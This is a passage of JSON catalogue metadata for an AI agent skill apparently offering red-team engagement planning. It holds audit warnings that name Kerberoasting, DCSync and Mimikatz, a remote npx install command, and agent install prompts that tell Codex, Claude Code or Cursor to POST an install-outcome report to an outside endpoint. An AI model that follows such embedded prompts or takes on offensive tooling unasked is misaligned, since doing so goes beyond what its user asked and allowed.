Planning","primaryTarget":"CLI","targetCount":4},"githubQuality":{"stars":397,"starsLabel":"397","forks":75,"license":"MIT","qualityScore":77,"trustScore":66,"auditScore":77},"maintenance":{"status":"fresh","label":"2d since push","daysSincePush":2,"lastPushedAt":"2026-09-03T08:31:38+00:00"},"risk":{"level":"needs_review","label":"Needs review","requiresReview":true,"notes":["Dependency or permission surface needs review","Permission surface may require sandboxing","Financial research output is not financial advice; require human review before any live investment decision","The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","The script `engagement_planner.py` is provided but not fully reviewed; it appears to generate planning documents only and does not execute attacks."]},"coverageTags":["Research","Research agents","design-creative","cybersecurity","red-team","c2","lateral-movement","persistence"]},"audit":{"audit_score":77,"risk_level":"needs_review","risk_label":"Needs review","quality_score":77,"trust_score":66,"maintenance_score":100,"security_score":70,"install_score":92,"warnings":["Dependency or permission surface needs review","Permission surface may require sandboxing","Financial research output is not financial advice; require human review before any live investment decision","The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","The script `engagement_planner.py` is provided but not fully reviewed; it appears to generate planning documents only and does not execute attacks.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access","Permission surface: secrets or environment access, shell or command execution"]},"quality_signals":{"model":"v2","star_score":18.2,"usage_score":0,"review_score":5.25,"metadata_score":7,"freshness_score":15},"platforms":["Claude Code","Browser agents"],"use_cases":[{"slug":"research-agents","title":"Research agents","url":"https://www.openagentskill.com/use-cases/research-agents"},{"slug":"workflow-automation","title":"Workflow automation","url":"https://www.openagentskill.com/use-cases/workflow-automation"},{"slug":"testing-qa","title":"Testing and QA","url":"https://www.openagentskill.com/use-cases/testing-qa"},{"slug":"local-desktop","title":"Local desktop","url":"https://www.openagentskill.com/use-cases/local-desktop"}],"stacks":[{"slug":"frontend-product-ui","title":"Frontend and UI","url":"https://www.openagentskill.com/collections/frontend-product-ui"},{"slug":"research-report-agent","title":"Research report agent","url":"https://www.openagentskill.com/collections/research-report-agent"},{"slug":"content-growth-agent","title":"Content growth agent","url":"https://www.openagentskill.com/collections/content-growth-agent"}],"install":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","install_targets":[{"id":"openagentskill-cli","label":"CLI","title":"OpenAgentSkill CLI","kind":"command","value":"npx --yes https://github.com/Leon-Drq/openagentskill/releases/download/cli-v0.3.0/openagentskill-0.3.0.tgz add masriyan-red-team-operations-engagement-planning","description":"Resolve policy, run the source installer safely, and report a verified install receipt.","copyLabel":"Copy command"},{"id":"codex","label":"Codex","title":"Codex install prompt","kind":"agent-prompt","value":"Install the \"Red Team Operations & Engagement Planning\" agent skill from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {\"event_id\":\"install_<unique-id>\",\"skill_slug\":\"masriyan-red-team-operations-engagement-planning\",\"task\":\"Install Red Team Operations & Engagement Planning\",\"agent\":\"codex\",\"outcome\":\"success\",\"install_used\":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.","description":"Give Codex a repo-aware install prompt when the skill is not available through a local CLI.","copyLabel":"Copy prompt"},{"id":"claude-code","label":"Claude Code","title":"Claude Code skill prompt","kind":"agent-prompt","value":"Add \"Red Team Operations & Engagement Planning\" as a Claude Code skill from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops. Inspect the skill instructions, place the reusable skill files in the appropriate local skills location for this project, and report the activation steps. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {\"event_id\":\"install_<unique-id>\",\"skill_slug\":\"masriyan-red-team-operations-engagement-planning\",\"task\":\"Install Red Team Operations & Engagement Planning\",\"agent\":\"claude-code\",\"outcome\":\"success\",\"install_used\":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.","description":"Use this prompt to ask Claude Code to add the skill and explain the local activation steps.","copyLabel":"Copy prompt"},{"id":"cursor","label":"Cursor","title":"Cursor rule prompt","kind":"agent-prompt","value":"Turn \"Red Team Operations & Engagement Planning\" from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops into a reusable Cursor project rule or agent instruction. Preserve the core workflow, adapt paths to this repo, and keep the rule scoped to tasks where it is relevant. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {\"event_id\":\"install_<unique-id>\",\"skill_slug\":\"masriyan-red-team-operations-engagement-planning\",\"task\":\"Install Red Team Operations & Engagement Planning\",\"agent\":\"cursor\",\"outcome\":\"success\",\"install_used\":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.","description":"Use this when installing as Cursor project rules or reusable agent instructions.","copyLabel":"Copy prompt"}],"repository":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops","github_repo":"Masriyan/Claude-Code-CyberSecurity-Skill","version":"3.0.0","license":"MIT","urls":{"web":"https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning","repository":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops","api":"/api/agent/skills/masriyan-red-team-operations-engagement-planning","install_api":"/api/skills/masriyan-red-team-operations-engagement-planning/install"},"meta":{"created_at":"2026-09-05T18:27:28.151952+00:00","updated_at":"2026-09-05T18:27:28.224384+00:00","agent_friendly":true}}